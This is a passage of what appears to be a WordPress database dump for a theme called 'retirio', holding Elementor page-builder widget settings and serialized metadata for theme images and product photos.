me.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-service-sidebar-contact.jpg\",\"id\":1204,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.1,\"sizes\":[]},\"overlay_blend_mode\":\"luminosity\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"dd59ecb\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"ovaicon ovaicon-phone-call\",\"library\":\"ovaicon\"},\"view\":\"stacked\",\"title_text\":\"Easy solutions to your home beauty\",\"description_text\":\"\",\"primary_color\":\"#FFFFFF\",\"secondary_color\":\"#E3B25A\",\"icon_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"icon_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"icon_padding\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]},\"title_typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"b1f30df\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Call anytime\",\"items_info\":[{\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"84573c5\",\"type\":\"phone\",\"phone_label\":\"+ 98 (000) - 9630\",\"phone_address\":\"980009630\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"label_typography_font_weight\":\"400\",\"label_alignment\":\"center\",\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"800\",\"show_dot_corner\":\"\",\"line_color_hover\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49bdb61\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"60\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3dd2c54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6e6d063\",\"elType\":\"widget\",\"settings\":{\"text\":\"Download our flyers\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_color\":\"#242424\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"button_text_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"button_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(332,1173,'_elementor_page_assets','a:0:{}'),(333,3838,'_wp_attached_file','2022/06/line-1.png'),(334,3838,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:190;s:6:\"height\";i:147;s:4:\"file\";s:18:\"2022/06/line-1.png\";s:8:\"filesize\";i:1530;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"line-1-150x147.png\";s:5:\"width\";i:150;s:6:\"height\";i:147;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1051;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"line-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:948;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(336,3839,'_wp_attached_file','2022/06/line-2.png'),(337,3839,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:202;s:6:\"height\";i:114;s:4:\"file\";s:18:\"2022/06/line-2.png\";s:8:\"filesize\";i:1432;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"line-2-150x114.png\";s:5:\"width\";i:150;s:6:\"height\";i:114;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1010;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"line-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1091;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(339,3938,'_wp_attached_file','2022/06/background-service-home-1.png'),(340,3938,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:544;s:4:\"file\";s:37:\"2022/06/background-service-home-1.png\";s:8:\"filesize\";i:213534;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:36:\"background-service-home-1-300x85.png\";s:5:\"width\";i:300;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12125;}s:5:\"large\";a:5:{s:4:\"file\";s:38:\"background-service-home-1-1024x290.png\";s:5:\"width\";i:1024;s:6:\"height\";i:290;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89093;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9009;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-768x218.png\";s:5:\"width\";i:768;s:6:\"height\";i:218;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55905;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:38:\"background-service-home-1-1536x435.png\";s:5:\"width\";i:1536;s:6:\"height\";i:435;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:173955;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-768x544.png\";s:5:\"width\";i:768;s:6:\"height\";i:544;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92179;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48406;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-378x544.png\";s:5:\"width\";i:378;s:6:\"height\";i:544;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40834;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115584;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:37:\"background-service-home-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27536;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-600x170.png\";s:5:\"width\";i:600;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37594;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:37:\"background-service-home-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4796;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(342,3980,'_wp_attached_file','2022/06/decor-primary-home-3.png'),(343,3980,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:499;s:4:\"file\";s:32:\"2022/06/decor-primary-home-3.png\";s:8:\"filesize\";i:1712;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:32:\"decor-primary-home-3-180x300.png\";s:5:\"width\";i:180;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:101;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"decor-primary-home-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:32:\"decor-primary-home-3-300x473.png\";s:5:\"width\";i:300;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:32:\"decor-primary-home-3-300x473.png\";s:5:\"width\";i:300;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:32:\"decor-primary-home-3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:106;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:32:\"decor-primary-home-3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(345,4065,'_wp_attached_file','2022/06/product-01.jpg'),(346,4065,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-01.jpg\";s:8:\"filesize\";i:129875;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-01-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9396;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3816;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-01-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20610;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-01-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33966;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-01-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31966;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9818;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2678;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(347,4066,'_wp_attached_file','2022/06/product-02.jpg'),(348,4066,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:611;s:4:\"file\";s:22:\"2022/06/product-02.jpg\";s:8:\"filesize\";i:141393;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-02-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14533;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6024;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-02-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28497;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-02-378x611.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:37406;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-02-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42017;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15553;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3749;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(349,4067,'_wp_attached_file','2022/06/product-03.jpg'),(350,4067,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-03.jpg\";s:8:\"filesize\";i:105424;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-03-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5433;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2648;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-03-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9614;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-03-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14143;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-03-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14368;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5861;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1917;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(351,4068,'_wp_attached_file','2022/06/product-04.jpg'),(352,4068,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:611;s:4:\"file\";s:22:\"2022/06/product-04.jpg\";s:8:\"filesize\";i:105885;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-04-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9286;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4179;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-04-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17471;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-04-378x611.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:611;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25784;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-04-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25695;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-04-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9803;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-04-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2784;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(353,4069,'_wp_attached_file','2022/06/product-05.jpg'),(354,4069,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-05.jpg\";s:8:\"filesize\";i:97390;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-05-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6630;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3204;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-05-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12416;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-05-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18418;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-05-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19833;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-05-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7226;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-05-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2296;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(355,4070,'_wp_attached_file','2022/06/product-06.jpg'),(356,4070,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-06.jpg\";s:8:\"filesize\";i:127472;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-06-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11001;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4134;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-06-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22896;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-06-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32532;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-06-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35698;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-06-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11991;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-06-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2628;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(357,4071,'_wp_attached_file','2022/06/product-07.jpg'),(358,4071,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-07.jpg\";s:8:\"filesize\";i:153987;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"product-07-281x300.jpg\";s:5:\"width\";i:281;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13882;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"product-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5518;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-07-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26863;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:22:\"product-07-378x610.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38448;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:22:\"product-07-572x473.jpg\";s:5:\"width\";i:572;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46039;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"product-07-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14722;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-07-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3546;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(359,4072,'_wp_attached_file','2022/06/product-08.jpg'),(360,4072,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:572;s:6:\"height\";i:610;s:4:\"file\";s:22:\"2022/06/product-08.jpg\";s:8:\"filesize\";i:81057;s:5:\"sizes\